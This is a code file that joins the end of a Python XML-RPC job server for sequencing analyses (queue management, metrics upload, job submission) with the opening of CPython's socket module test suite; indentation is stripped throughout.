of analyses (literally ``Analysis`` objects) waiting to be run. It
operates a thread that sequentially pops analyses from the queue and
runs them each in a separate thread.
The process of running each analysis consists of three parts. It is
implemented in the ``run_analysis`` method.
#. First, the ``AnalysisQueue`` acquires a lock, and calls the
``Analysis`` object's ``initiate()`` method.
#. If the call to ``initiate()`` returns a valid proxy object,
the ``AnalysisQueue`` releases the lock and calls the proxy's
``wait()`` method.
#. Once the proxy's ``wait()`` returns, the ``AnalysisQueue`` again
acquires a lock and calls
the analysis object's ``conclude()`` method to clean up.
The reason for acquiring a lock is to allow the ``AnalysisQueue`` to keep
track of which analyses are running, and to make it easier to implement
queuing in the future. For example, it would be straightforward to
    have the ``AnalysisQueue``'s main thread wait until there are fewer than
    N analyses running before initiating another.

    A minimal usage sketch follows this class definition.
    """
def __init__(self, rootdir):
if rootdir.startswith("../"):
rootdir = path.join(os.getcwd(), rootdir)
self.cv = threading.Condition()
self.exit_event = threading.Event()
self.q = []
self.monitors = []
self.running = {}
self.rootdir = rootdir
self.start_time = None
def is_running(self, pk):
"""Determine if an analysis identified by ``pk`` is in progress."""
return pk in self.running
def run_analysis(self, a):
"""Spawn a thread which attempts to start an analysis."""
def go():
# acquire a lock while initiating
self.cv.acquire()
try:
waiter = a.initiate(self.rootdir)
finally:
self.cv.release()
if waiter is not None:
# analysis was successfully initiated
logger.info("%s successfully started" % str(a.name))
assert a.pk not in self.running
self.running[a.pk] = a
# wait for analysis to conclude
comm_result = waiter.communicate()
# acquire lock before terminating
self.cv.acquire()
try:
a.conclude(comm_result)
finally:
if a.pk in self.running:
del self.running[a.pk]
self.cv.release()
logger.info("%s completed" % str(a.name))
else:
# bail, initiation failed
logger.error("%s failed to start" % str(a.name))
return
tr = threading.Thread(target=go)
tr.setDaemon(True)
self.monitors.append(tr)
tr.start()
return tr
def loop(self):
"""Remove un-initiated analyses from the analysis queue, and
run them."""
self.start_time = datetime.datetime.now()
def _loop():
while not self.exit_event.isSet():
self.cv.acquire()
while len(self.q) == 0:
self.cv.wait()
if self.exit_event.is_set():
logger.info("Main loop exiting")
return # leave loop if we're done
a = self.q.pop(0)
self.cv.release()
self.run_analysis(a)
tr = threading.Thread(target=_loop)
tr.setDaemon(True)
tr.start()
return tr
def add_analysis(self, a):
"""Add an analysis to the queue."""
self.cv.acquire()
self.q.append(a)
self.cv.notify()
self.cv.release()
logger.info("Added analysis %s" % a.name)
def stop(self):
"""Terminate the main loop."""
self.exit_event.set()
self.cv.notify()
def status(self, save_path, pk):
"""Determine the status of an analysis identified by 'pk' running
at 'save_path'."""
self.cv.acquire()
try:
if pk in self.running:
ret = (True, self.running[pk].status_string())
else:
fname = path.join(save_path, "status.txt")
if not path.exists(fname):
ret = (False, "Unknown")
else:
infile = open(fname)
retcode = int(infile.read())
infile.close()
if retcode == 0:
ret = (True, "Completed Successfully")
else:
ret = (False, "Failed")
finally:
self.cv.release()
return ret
def all_jobs(self):
"""Return a list of (pk,proxy) for all currently running jobs."""
return list(self.running.items())
def n_jobs(self):
"""Return the number of jobs currently running."""
return len(self.running)
def uptime(self):
"""Return the amount of time the ``AnalysisQueue`` has been running."""
if self.start_time is None:
return 0
else:
diff = datetime.datetime.now() - self.start_time
seconds = float(diff.days * 24 * 3600)
seconds += diff.seconds
seconds += float(diff.microseconds) / 1000000.0
return seconds
def control_job(self, pk, signal):
logger.debug("Analysis queue control_job: %s %s" % (pk, signal))
"""Terminate, suspend, or resume a job."""
self.cv.acquire()
try:
if not self.is_running(pk):
ret = (False, "not running")
else:
a = self.running[pk]
fn = {"term": a.terminate, "stop": a.suspend, "cont": a.resume}.get(
signal.lower()
)
if fn is None:
ret = (False, "invalid signal")
else:
ret = (fn(), "executed")
finally:
self.cv.release()
return ret
def best_analysis_class(self):
if have_drmaa(""):
return DRMAnalysis
else:
return LocalAnalysis
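def _example_queue_usage(rootdir, analysis):
    """Sketch only -- never called by this module.

    Illustrates the AnalysisQueue lifecycle described in the class docstring:
    construct the queue, start its scheduling loop, enqueue work, then poll or
    control it by primary key. `rootdir` and `analysis` are hypothetical
    arguments supplied by the caller.
    """
    aq = AnalysisQueue(rootdir)
    aq.loop()                                # spawn the daemon scheduling thread
    aq.add_analysis(analysis)                # initiate() -> communicate() -> conclude()
    running, message = aq.status(analysis.savePath, analysis.pk)
    aq.control_job(analysis.pk, "term")      # "term" | "stop" | "cont"
    aq.stop()
    return running, message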
class AnalysisServer(xmlrpc.XMLRPC):
"""Remote procedure call server that links the database with the
analysis queue.
Built on top of Twisted's XMLRPC server.
"""
def __init__(self, analysis_queue):
xmlrpc.XMLRPC.__init__(self)
self.q = analysis_queue
def xmlrpc_updatestatus(self, primarykeyPath, status, reportLink):
from ion.reports import uploadMetrics
try:
uploadMetrics.updateStatus(primarykeyPath, status, reportLink)
except Exception:
logger.error("Update status failed")
return traceback.format_exc()
return 0
def xmlrpc_uploadmetrics(
self,
tfmapperstats_outputfile,
procPath,
beadPath,
ionstats_alignment_json_path,
ionParamsPath,
peakOut,
ionstats_basecaller_json_path,
BaseCallerJsonPath,
primarykeyPath,
uploadStatusPath,
STATUS,
reportLink,
cwd,
):
"""Upload Metrics to the database"""
from ion.reports import uploadMetrics
try:
return_message = uploadMetrics.writeDbFromFiles(
tfmapperstats_outputfile,
procPath,
beadPath,
ionstats_alignment_json_path,
ionParamsPath,
STATUS,
peakOut,
ionstats_basecaller_json_path,
BaseCallerJsonPath,
primarykeyPath,
uploadStatusPath,
cwd,
)
# this will replace the five progress squares with a re-analysis button
uploadMetrics.updateStatus(primarykeyPath, STATUS, reportLink)
except Exception as err:
logger.error("Upload Analysis Metrics failed: %s", err)
return traceback.format_exc()
return return_message
def xmlrpc_uploadanalysismetrics(self, beadPath, primarykeyPath):
logger.info("Updating bead find metrics for %s" % primarykeyPath)
from ion.reports import uploadMetrics
try:
message = uploadMetrics.updateAnalysisMetrics(beadPath, primarykeyPath)
logger.info("Completed Upload Analysis Metrics")
        except Exception as err:
            logger.error("Upload Analysis Metrics failed: %s", err)
            message = traceback.format_exc()
        return message
def xmlrpc_submitjob(
self,
jt_nativeSpecification,
jt_remoteCommand,
jt_workingDirectory,
jt_outputPath,
jt_errorPath,
jt_args,
jt_joinFiles,
):
jt = _session.createJobTemplate()
jt.nativeSpecification = jt_nativeSpecification
jt.remoteCommand = jt_remoteCommand
jt.workingDirectory = jt_workingDirectory
jt.outputPath = jt_outputPath
jt.errorPath = jt_errorPath
jt.args = jt_args
jt.joinFiles = jt_joinFiles
jobid = _session.runJob(jt)
_session.deleteJobTemplate(jt)
return jobid
def xmlrpc_jobstatus(self, jobid):
"""Get the status of the job"""
try:
logger.debug("xmlrpc jobstatus for %s" % jobid)
status = _session.jobStatus(jobid)
except Exception:
logger.error("Job Status failure for %s" % jobid)
status = "DRMAA BUG"
return status
def xmlrpc_startanalysis(
self, name, script, parameters, files, savePath, pk, chipType, chips, job_type
):
"""Add an analysis to the ``AnalysisQueue``'s queue of waiting
analyses."""
logger.debug("Analysis request received: %s" % name)
ACls = self.q.best_analysis_class()
la = ACls(
name, script, parameters, files, savePath, pk, chipType, chips, job_type
)
self.q.add_analysis(la)
return name
def xmlrpc_status(self, save_path, pk):
"""Get the status of the job specified by ``pk`` from the
``AnalysisQueue``."""
return self.q.status(save_path, pk)
def xmlrpc_n_running(self):
"""Return the number of jobs the ``AnalysisQueue`` is currently
running."""
return self.q.n_jobs()
def xmlrpc_uptime(self):
"""Return the ``AnalysisQueue``'s uptime."""
logger.debug("uptime checked")
return self.q.uptime()
def xmlrpc_running(self):
"""Return status information about all jobs currently running."""
items = self.q.all_jobs()
ret = []
for pk, a in items:
ret.append((a.name, a.get_id(), a.pk, a.ANALYSIS_TYPE, a.status_string()))
logger.debug(
"Name:%s JobId:%s PK:%s State:'%s'"
% (a.name, a.get_id(), a.pk, a.status_string())
)
return ret
def xmlrpc_control_job(self, pk, signal):
"""Send the given signal to the job specified by ``pk``."""
logger.debug("xmlrpc_control_job: %s %s" % (pk, signal))
return self.q.control_job(pk, signal)
def xmlrpc_test_path(self, path):
"""Determine if ``path`` is readable and writeable by the job
server."""
return os.access(path, os.R_OK | os.W_OK)
def xmlrpc_createRSMExperimentMetrics(self, resultId):
try:
from iondb.rundb.report import tasks as rsmtasks
rsmtasks.createRSMExperimentMetrics(resultId)
return True, "RSM createExperimentMetrics"
except Exception:
logger.error(traceback.format_exc())
return False, traceback.format_exc()
def xmlrpc_resultdiskspace(self, pk):
"""Launches celery task which determines disk space usage and records it
in the Results object for the given primary key reference"""
# Update the Data Management DMFileStat objects related to this Result object
try:
from iondb.rundb.data.tasks import update_dmfilestat_diskusage
update_dmfilestat_diskusage.delay(pk)
except Exception:
logger.warn("update_diskusage celery task failed to launch")
# Generate serialized json file for future Data Management Import
try:
from iondb.rundb.data.tasks import save_serialized_json
save_serialized_json.delay(pk)
except Exception:
logger.warn("save_serialized_json celery task failed")
return 0
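# A minimal client-side sketch (not part of the original module), assuming the job
# server is reachable on localhost at settings.JOBSERVER_PORT. Twisted's XMLRPC
# resource exposes each xmlrpc_<name> method above under the plain name <name>.
# The helper and every argument value shown are hypothetical, and nothing here
# calls it.
def _example_client_submit(name, script, params, save_path, pk):
    import xmlrpclib  # Python 2 standard-library XML-RPC client
    proxy = xmlrpclib.ServerProxy("http://127.0.0.1:%d" % settings.JOBSERVER_PORT)
    # files is a list of (filename, content) pairs written into the job directory
    proxy.startanalysis(name, script, params, [], save_path, pk, "", {}, "analysis")
    return proxy.status(save_path, pk)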
if __name__ == "__main__":
try:
logger.info("ionJobServer Started Ver: %s" % __version__)
aq = AnalysisQueue(settings.ANALYSIS_ROOT)
aq.loop()
r = AnalysisServer(aq)
reactor.listenTCP(settings.JOBSERVER_PORT, server.Site(r))
reactor.run()
except Exception as err:
logger.exception("Job Server run-time failure.")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
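# Illustrative helper (not part of the upstream test classes): packing a raw CAN
# frame with the `can_frame_fmt` documented in SocketCANTest above. Field values
# are arbitrary examples; nothing in this file calls it.
def _example_build_can_frame(can_id, data):
    """Return bytes laid out like struct can_frame ("=IB3x8s")."""
    can_dlc = len(data)               # data length code: 0 .. 8
    data = data.ljust(8, b'\x00')     # pad the payload to the fixed 8-byte field
    return struct.pack(SocketCANTest.can_frame_fmt, can_id, can_dlc, data)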
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
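#
# For example (illustrative only), a combination along the lines of
#
#     class ExampleConnectedTCPTest(ConnectedStreamTestMixin, TCPTestBase):
#         pass
#
# behaves like SocketConnectedTest while taking its address family, serv_addr
# and cli_addr from the chosen base classes.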
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
        # Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
